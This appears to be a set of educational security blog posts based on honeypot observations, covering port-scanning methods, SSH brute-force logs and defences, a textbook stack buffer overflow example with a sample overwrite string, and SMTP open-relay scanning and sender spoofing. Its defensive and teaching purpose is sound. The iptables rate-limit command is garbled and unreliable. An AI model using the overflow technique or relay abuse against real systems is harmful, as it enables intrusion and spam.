As we saw, an attacker start of using a scanner against a particular range of ip’s, would then see if there are services available, then do a dictionary attack using the country’s victim language, extracted from the IP. Or could also detect vulnerabilities in the system, that he could use to gain access. After having access to the computer the attacker terminate by installing a rootkit to gain permanent access to this system.

As a bonus I also explain some minimalistic examples of how can someone, that have physical access to a system, can gain root access to it exploiting some programs that are running in that system.

This area is so vast that is still impossible to predict the ways to do an attack. Imagine that an attacker gain access to a computer, but they don’t have root credentials. Attackers probably will try to exploit some programs that are running in that systems…

21 01 2009

## Intro

In this post I will talk about some of the techniques used to attack systems, and some solutions that can reduce much the number of attacks that a system may suffer. A vision to the attack from scanning to gain root in one system.
This work is a continuation of my work on honeypots. The attacks presented here could be seen in a honeypot of high activity, real systems that have known vulnerabilities. Unfortunately I used one low activity honeypot in previous posts, emulation of vulnerabilities, so I just could not get to identify some of the attacks mentioned herein.
This post continues in Part II.

## Starting

First let me talk about the profile of the principal threat that we face from the moment
we use the Internet, the Script Kiddie.
To a Script Kiddie not interest who is he attacking, its only purpose is to gain root access in a machine. The problem is that for helping him he has several tools that automate all the process, the only thing that usually has to do is put the tool to scan the entire Internet.
Sooner or later it is guaranteed that he will get access in some machine.
The fact that these tools are becoming more known ally to randomness searches, this threat is extremely dangerous because it is not “if” but “when” we will be victims of a search.

I introduced the “who”, now let me introduce the “how”. Before starting any type of attack, the enemy must find that machines are online and their ports (services) that are open to the outside.
This technique is called Port Scanning

## Port Scanning

Port Scanning is used both by system administrators and by attackers, the first thing to determine the level of security of their machines; seconds to find the vulnerabilities as I said before.
I will give special focus to this technique because it domain is essential in both situations.

Basically a Port Scan is send a message to each port of a machine and depending on what kind of response we get determine the status of the port.

These possible state ports are:

• Open or Accepted: The machine has sent a response to indicate that a service that is listening port
• Closed, Denied or Not Listening: The machine has sent a response to indicate that any connection the port will be denied
• Filtered, Dropped or Blocked: There was no response from the machine

Just a note on the legality of this technique: in fact Port Scanning can be seen as a bell to ring to confirm if someone is home. Nobody can be accused of nothing just for doing a Port Scan. Now if we are playing constantly on the bell, could be alleged the similarity to a denial of service (for more about legal issues related to Port Scanning).

Now we are ready to see the most popular techniques in Port Scanning.

## TCP SYN scan

The SYN scan is the most popular because it can be done in a very quick way, searching thousands
of ports per second on a network (fast network and without firewalls). This kind of scan is relatively discreet because they never complete TCP connections. It also allows a distinct differentiation between the states of ports with a good confidence.
This technique is also known as semi-open scan because it never gets to open a complete TCP connection. It is sent a SYN packet (the beginning of a normal complete connection) and expects a answer. If it receives a SYN/ACK, the port is Open, if it receives a RST, the port is Closed, and if there is no response after several retransmissions of the SYN, the port is marked as Filtered.
This last scenario repeats itself in the event of an ICMP Unreachable Error.

Normal scenario (client send a SYN, server reply with SYN/ACK, and client send an ACK):

TCP SYN attack (client send a SYN, server reply with SYN/ACK, and client do nothing):

This technique is used when the user does not have privileges to create crude packets (in nmap for example, you must have root privileges to this option.) Rather than be sent in “custom” packets as in all other techniques mentioned here, it established a complete TCP connection in the target machine port. This causes a considerable increase of time for giving same information as the previous technique (most packets are produced). In addition, most operative systems log these connections, because it is not a quick or silent scan. On Unix, for example, is added an entry in syslog.

## UDP scan

A UDP scanis much slower than a TCP one, one of the reasons why many systems administrators ignore the security of these ports, but not the attackers.
This technique consists in sending an empty UDP header (no data) to all target ports. If an ICMP Unreachable Error is returned, depending on type and code of error is given the port state (Closed or Filtered). However if returned another UDP header, then the port is Open, if not received any response after the retransmissions of the header, the port is classified as a combination of Open or Filtered because may be in a state or in the other.

But as I said the greatest disadvantage of this technique is the time spent on scan; Open or Filtered ports rarely respond which can lead to several retransmissions (because it is assumed that the packet could have been lost). Closed ports are an even bigger problem because normally respond with ICMP Unreachable Errors and many operative systems limit the frequency of ICMP packets transmission, as a example in Linux that normally limited to a maximum of one package per second.

Faced with such constraints, if we were to the full range of ports of a machine (65536 ports) it will take more than 18 hours. Some optimizations can pass through the more common ports.

There are many others techniques used in Port Scanning (more information: here) but this ones come to show the behavior of this type of scan. It is easy to see why it is a critical process for an attacker methodology. For the correct identification of the target, only one technique can not be the most appropriate/enough.
So the Port Scanning area is not only making TCP SYN scans.
The tool I recommend to Port Scanning is the Nmap because it supports all these techniques that I said, and a lot more. This tool is being actively developed, and the author Gordon “Fyodor” Lyon is a guru in this area and highly responsible for the constant development of it.

At this time the attacker already has a huge list of reachable machines and services. Now to get remote access on a machine, in essence, we can use two techniques: brute-force/password dictionaries (see the Infinite monkey theorem).

It may seem silly but it is still heavily used in services such as SSH. As you can see in your /var/log/auth.log file…

```Dec 24 01:24:46 kubos sshd[23906]: Invalid user oracle from 89.235.152.18
Dec 24 01:24:46 kubos sshd[23906]: pam_unix(ssh:auth): check pass; user unknown
Dec 24 01:24:46 kubos sshd[23906]: pam_unix(ssh:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=89.235.152.18
Dec 24 01:24:48 kubos sshd[23906]: Failed password for invalid user oracle from 89.235.152.18 port 48785 ssh2
Dec 24 01:24:49 kubos sshd[23908]: reverse mapping checking getaddrinfo for 89-235-152-18.adsl.sta.mcn.ru [89.235.152.18] failed - POSSIBLE BREAK-IN ATTEMPT!

Dec 24 01:26:01 kubos sshd[23963]: Invalid user test from 89.235.152.18
Dec 24 01:26:01 kubos sshd[23963]: pam_unix(ssh:auth): check pass; user unknown
Dec 24 01:26:01 kubos sshd[23963]: pam_unix(ssh:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=89.235.152.18
Dec 24 01:26:04 kubos sshd[23963]: Failed password for invalid user test from 89.235.152.18 port 57886 ssh2
Dec 24 01:26:05 kubos sshd[23965]: reverse mapping checking getaddrinfo for 89-235-152-18.adsl.sta.mcn.ru [89.235.152.18] failed - POSSIBLE BREAK-IN ATTEMPT!

Dec 24 01:26:21 kubos sshd[23975]: Invalid user cvsuser from 89.235.152.18
Dec 24 01:26:21 kubos sshd[23975]: pam_unix(ssh:auth): check pass; user unknown
Dec 24 01:26:21 kubos sshd[23975]: pam_unix(ssh:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=89.235.152.18
Dec 24 01:26:22 kubos sshd[23975]: Failed password for invalid user cvsuser from 89.235.152.18 port 59883 ssh2
Dec 24 01:26:24 kubos sshd[23977]: reverse mapping checking getaddrinfo for 89-235-152-18.adsl.sta.mcn.ru [89.235.152.18] failed - POSSIBLE BREAK-IN ATTEMPT!```

And these are just some of the hundreds of attempts that it recorded.
I will then present some strategies for protection against these attacks:

This section may seem ridiculous but the fact that this type of attack is used demonstrates the lack of choice of passwords culture.
Here are some requirements to define a strong password in today times:

• A password should have, a minimum of 8 characters
• If the password can be found in a dictionary is trivial and is not good. Attackers have large dictionaries of words in different languages (via IP, for example, can determine the dictionary to use)
• As trivial variations of trivial passwords, such as “p4ssword” is almost as bad as “password” in a dictionary attack but is substantially better in an brute-force attack
• The password should ideally be a combination of symbols, numbers, uppercase and lowercase
• Mnemonic are easy to remember (even with special symbols) and this is the best kind of passwords, such as “Whiskey-Cola is EUR 3 in Academic Bar!” = “W-CiE3iAB!” (this password is Very String according to The Password Meter)

The fact is, using strong passwords can prevent the success of the attempt but not prevent the numerous attempts that are made consistently. And in an extreme situation might be suffering Denial of Service attacks (it is imperative to avoid this on a machine whose purpose is to offer the service to the outside).

Not mentioned the fact that we can limit the number of connections established in the port 22 (SSH) through iptables.

### Using iptables to mitigating the attacks

`iptables -A INPUT -m state --state NEW -m tcp -p tcp -s 192.168.1.100 --dport 22 -j ACCEPT`

The -s flag is used to indicate the source host ip.
We can also restrict the access to some sub-net, or some IP class address with this flag:

`iptables -A INPUT -m state --state NEW -m tcp -p tcp -s 192.168.1.0/24 -dport 22 -j ACCEPT`

If we want access our machine from everyware we might want to limit our server to accept, for example, 2 connections per minute:

`iptables -N SSH_CONNECTION -A INPUT -m state --state NEW -p tcp --dport 22 -j SSH_CONNECTION -A SSH_CONNECTION -m recent --set --name SSH -A SSH_CONNECTION -m recent --update --seconds 60 --hitcount 3 --name SSH -j DROP`

We can create a new chain called SSH_CONNECTION. The chain uses the recent module to allow at maximum two connection attempts per minute per IP.

## RSA authentication

To avoid the use of passwords, we can use a pair of RSA keys completely avoiding brute-force/dictionaries attacks.
To do this we will do the following steps:
Generate the key pair with the command

`ssh-keygen-t rsa`

This command create the files:
~/.ssh/id_rsa (private key) and ~/.ssh/id_rsa.pub (public key).
In each machine where we want to connect (target), put the “id_rsa.pub” generated in ~/.ssh/authorized_keys concatenate the contents of this form for example:

`cat id_rsa.pub >> ~/.ssh/authorized_keys`

In each machine where we want to call (home), put the “id_rsa” in ~/.ssh/

`/etc/init.d/sshd restart`

## Exploitation of vulnerabilities

Now that we reduce the chances of being attacked, let’s see another way that attackers use to gain access into a system.
Exploit is the name given to a piece of code used to exploit flaws in applications in order to cause a behavior not previously anticipated in them. Thus is common, for example, gaining control of a machine or spread privileges.
A widely used type of exploit is stack smashing which occurs when a program writes a memory address outside their allocated space for the structure of data in the stack, usually a buffer of fixed size. Take a very simple example of local implementation of this exploit:

```# include
# include

int main(int argc , char *argv []) {
char buffer [10];
strcpy (buffer ,argv [1]);
printf ( buffer );
return 0;
}```

When we try to execute the above code, we get:

```user@honeypot :~\$ gcc exploit .c -o exploit
user@honeypot :~\$ ./ exploit thisisanexploit
*** stack smashing detected ***: ./ exploit terminated
thisisanexploitAborted```

As we can see, GCC has introduced mechanisms for blocking implementation of code potentially malicious. But this example is as simple as possible. More sophisticated attacks against systems can avoid this mechanisms.

### The stack

When a function is called, the return value must be addressed, and it address must be somewhere saved in the stack. Saving the return address into the stack is one advantage, each task has its own stack, so each must have its return address. Another thing, is that recursion is completely supported. In case that a function call itself, a return address must be created for each recursive phase, in each stack function call.
For example, the following code:

```/** lengthOf  returns the length of list  l  */
public int lengthOf(Cell l) {
int length;

if ( l == null ) {
length = 0;
}
else {
length = 1 + lengthOf(l.getNext());
}
return length;
}```

Will produce the following stacks:

The stack also contain local data storage. If any function declare local variables, they are stored there also. And may also contain parameters passed to the function, for more information about that.

### GCC and Stack canary’s

If you wondering why a canary.
GCC, and other compilers insert in the stack known values to monitor buffer overflows. In the case that the stack buffer overflows, the first field to be corrupted will be the canary. Forward, the sub-routines inserted into the program by GCC verify the canary field and verify that this as changed, sending a message “*** stack smashing detected ***”.

### Stack corruption

If you still thinking what stack buffer overflow is god for? I give you a simple example (from Wikipedia article).
Imagine you have the following code:

```void foo (char *bar)
{
char  c[12];

memcpy(c, bar, strlen(bar));  // no bounds checking...
}

int main (int argc, char **argv)
{
foo(argv[1]);
}```

As you can see, there are no verification about the input of the function foo, about the *bar variable.
This is the stack that are created at some point when this function is called by another one:

When you call the foo, like:

```void function() {
char *newBar = (char *)malloc(sizeof(char)*6);
strcpy(newBar,"hello");
foo(newBar);
}
```

This is what happens to the stack:

Now, if you try this:

```void function() {
char *newBar = (char *)malloc(sizeof(char)*24);
strcpy(newBar,"A​A​A​A​A​A​A​A​A​A​A​A​A​A​A​A​A​A​A​A​x08​x35​xC0​x80");
foo(newBar);
}
```

This is what happens to the stack:

So, now, when the foo function terminates, it will pop the return address and jump to that address (0x08C03508, in this case), and not to the expected one. In this iamge, the address 0x08C03508 is the beginning of the char c[12] code. Where the attacker can previously put shellcode, and not AAAAA string…
Now imagine that this program is SUID bit on to run as root, you can instantly scale to root…

Fortunately this kind of attacks is being to reduce, since the introduction of stack canary’s. This kind of protection is possible because the stack is not dynamic, but as we gone see later (in part II), the heap is.

## SMTP Attacks

11 01 2009

This post is part of the results discovered when the honeypot was running. This port concerns to SMTP connections to the honeypot.

## SMTP

SMTP stands for Simple Mail Transfer Protocol, defined in RFC 2821, it is a standard protocol that allows transmission e-mails through IP networks.
Typically the SMTP is used on the server side to send and receive e-mail messages while on the client side is only used to send e-mails. To receive clients use the protocol POP3 or Internet Message Access Protocol (IMAP).

In the following chart I will show the activity that were on our honeypot, throw port 25, while our honeypot was on:

## SMTP & Bad SMTP configuration

The e-mail client (SMTP client) connects to port 25 of the e-mail server, this is the default SMTP port, and sends an EHLO to the server indicating his identity. The server opens the session and provide a list of the extensions it supports in a machine-readable format.

```S: 220 bps-pc9.local.mynet Microsoft ESMTP MAIL Service, Version: 5.0.2195.5329 ready at  Dom Jan 11 19:32:00 WET 2009
C: EHLO localhost
S: 250-bps-pc9.local.mynet Hello [1]
S: 250-TURN
S: 250-ATRN
S: 250-SIZE
S: 250-ETRN
S: 250-PIPELINING
S: 250-DSN
S: 250-ENHANCEDSTATUSCODES
S: 250-8bitmime
S: 250-BINARYMIME
S: 250-CHUNKING
S: 250-VRFY
S: 250-XEXCH50}
S: 250 OK
```

The 250 code is the best message from all available and means: Requested action taken and completed. In fact this EHLO message is an extension to SMTP (ESMTP), according to RFC1869. Because so, some old servers may not support EHLO command, and in that case the client must use HELO.

Spammers can pass throw unchecked HELO commands, hitting non fully qualified domain names to identify herself.
As we have seen in the honeypot log files, many attempts from spammers to do that:

```EHLO user-3i39rqqo1r
...
EHLO premier-ksxhhv6
...
EHLO mta101
...
EHLO msg-g09pmirpcam
```

We can reduce this attempts just requiring the identity between […], and configuring SMTP server to check that.
Another idea is to check the HELO/EHLO argument and verify if it does not resolve in DNS. There are lot more kind of validations to resolve this problem, but unfortunately seems that a lot of SMTP administrators simply ignore section 3.6 of RFC2821.
Of course we don’t implement that in our honeypot, because we want to attract all kind of people to interact with our system.

Here is some statistics from identification attempts to the SMTP server in our honeypot:

And here you can see the preferred command from attackers:

So, we can really do something to stop spreading spamm from the networks…

Continuing with explanation of SMTP: now, if we want to send an e-mail, we must start with MAIL FROM: and the the e-mail address of the sender, between brackets. In the example below I do not use brackets because of HTML, but in SMTP server you will need.

```C: MAIL FROM: from@domain.com
S: 250 from@domain.com... Sender ok
```

This command tells the server that a new mail is starting to be done, and the server reset all its state tables and buffers, from previous e-mails. If SMTP accept then it return the code 250. SMTP do a validation here, to verify is the person who is using the service can send mail’s using e-mail address from@domain.com.

Now the e-mail client can give the address of the recipient of the message. The command to perform this action, RCPT TO:

```C: RCPT TO: to@domain.com
S: 250 to@domain.com... Recipient ok (will queue)
```

The server will save the mail locally, and we are ready to write the body of our e-mail.
To start writing the message we hit:

```C: DATA
S: 354 Start mail input; end with CRLF.CRLF
C: From: from@domain.com
C: To: realTO@domain.com
C: Subject: BC_82.155.126.2
C: Date: Sun, 07 Dec 08 19:24:09 GMT
C: Hello, I'm a spammer!
```

Yes, in fact you can put a completely different e-mail and name from the one you put in RCPT TO.
When the message is finished, you hit CRLF.CRLF and you are done, the e-mail will be added to the queue, and will be sent.

The problem begins when the SMTP server don’t verify the command FROM parameter, that is what is called an Open Mail Relay.

## Open Relay Scanners

The SMTP servers support a lot of configurations, just like other servers. We say that an open mail relay is an SMTP server configuration that allow anyone on the Internet to send e-mail. This e-mails could be sent to known and not known users from the system. This used to be the default configuration of SMTP servers. With the emergence of spammers these systems began to appear on blacklists of other servers.
But the truth is that until today, some SMTP servers are configured this way. Allowing spreading of spamm and worms. Then you have John Gilmore who run a Open mail relay since the 90’s, and is blacklisted in a lot of servers.

We have find a lot of hit’s from open relay scanners in our honeypot:

```HELO 82.155.248.223
MAIL FROM:
RCPT TO:
DATA
Subject: Super webscan open relay check succeded, hostname = 82.155.248.223
```
```HELO 82.155.248.223
MAIL FROM:
RCPT TO:
DATA
Subject: Super webscan open relay check succeded, hostname = 82.155.248.223
```
```HELO 82.155.248.223
MAIL FROM:
RCPT TO:
DATA
Subject: Super webscan open relay check succeded, hostname = 82.155.248.223
```

We found also that all the open mail relay attacks where from cities in Taiwan, this country seems to have a big activity on what concerns to spamm, like ProjectHoneyPot page shows:

```118.165.91.55 - Taipei
219.86.32.1 - Hualien
124.11.193.219 - Taipei
124.11.192.173 - Taipei
114.44.42.34 - Taipei
114.44.43.87 - Taipei
```

I have checked, and all of them are blacklisted in international DNSBLs.
By the way, all of them use Windows XP SP1, if that matters…

With an open mail relay machine active, spammers can send a lot of spamm throw that machine to their targets, distributing the cost of sending spamm to various computers.

### Future Work

For now that’s all the stuff we find in our honeypot logs related to the SMTP server.
Stay tuned, for further news.